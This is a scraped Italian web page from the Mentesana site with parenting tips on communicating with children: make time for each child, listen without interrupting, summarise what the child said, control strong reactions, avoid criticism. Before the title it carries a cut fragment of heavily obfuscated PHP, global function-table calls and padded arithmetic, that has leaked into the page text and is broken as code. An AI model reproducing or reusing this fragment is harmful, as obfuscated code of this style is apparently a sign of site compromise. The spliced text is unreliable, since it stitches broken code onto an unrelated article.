=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Come migliorare la comunicazione con i figli

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
Come migliorare la comunicazione con i figli PDF 

ultima revisione gennaio 2014 - Mentesana

 

Fare il genitore non è un “mestiere” facile!

 

Sviluppare  una  buona  capacità  di  ascolto  e  di  dialogo  è  di  fondamentale  importanza  per  una  buona  intesa  con  i  figli

 


1) Mostrate la massima disponibilità verso vostro figlio

• imparate a riconoscere i momenti in cui vostro figlio è maggiormente disposto a comunicare con voi;
• iniziate per primi una conversazione e fategli capire quanto siete interessati a lui e alle cose che fa;
• iniziate una conversazione esprimendo un punto di vista piuttosto che facendo domande;
• settimanalmente, ritagliatevi del tempo da dedicare a ciascun figlio;
• imparate a riconoscere le passioni di vostro figlio e mostratevi interessati ad esse.


2) Mostrate il massimo ascolto verso vostro figlio

• se vostro figlio vi presenta un problema, interrompete ciò che state facendo e prestategli ascolto;
• esprimete tutto il vostro interesse per le cose che vostro figlio dice senza intromettervi troppo;
• prestate attenzione al suo punto di vista anche se questo dovesse risultare piuttosto difficile da comprendere;
• lasciategli completare il suo punto di vista prima di rispondere;
• fate un riassunto di ciò che avete ascoltato da vostro figlio assicurandovi così di aver compreso bene ciò che intendeva comunicarvi.


3) Mettetevi nella condizione di farvi ascoltare

• cercate di controllare le vostre reazioni più forti, perché nel caso in cui doveste mostrarvi arrabbiati o sulle difensive potreste rischiare di perdere la sintonia con vostro figlio;
• esprimete liberamente le vostre opinioni rispettando quelle di vostro figlio. Fategli capire che è normale che due persone siano in disaccordo;
• evitate di dire ciò che secondo voi è giusto o sbagliato. In alternativa potreste dire:”Lo so che tu non sei d’accordo con me, ma questo è ciò che penso!”
• durante la conversazione con vostro figlio cercate di focalizzare l’attenzione sui sentimenti e sulle emozioni mostrate da lui, piuttosto che su voi stessi.


4) Ricordate

• di chiedere sempre a vostro figlio cos’è che vuole da voi (per esempio, solo essere ascoltato, un consiglio, la soluzione di un problema, ecc.);
• che i bambini apprendono per imitazione, ciò significa che è molto probabile che i vostri figli assomiglieranno a voi nel modo in cui gestiranno le proprie emozioni e risolveranno i propri problemi;
• di non criticare vostro figlio mentre parlate con lui;
• che molto spesso i vostri figli vi mettono alla prova magari raccontandovi solo una piccola parte di ciò che li affligge. Perciò ascoltateli con molta attenzione ed incoraggiateli a parlare; vedrete che condivideranno con voi anche i più piccoli particolari dei loro problemi.

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito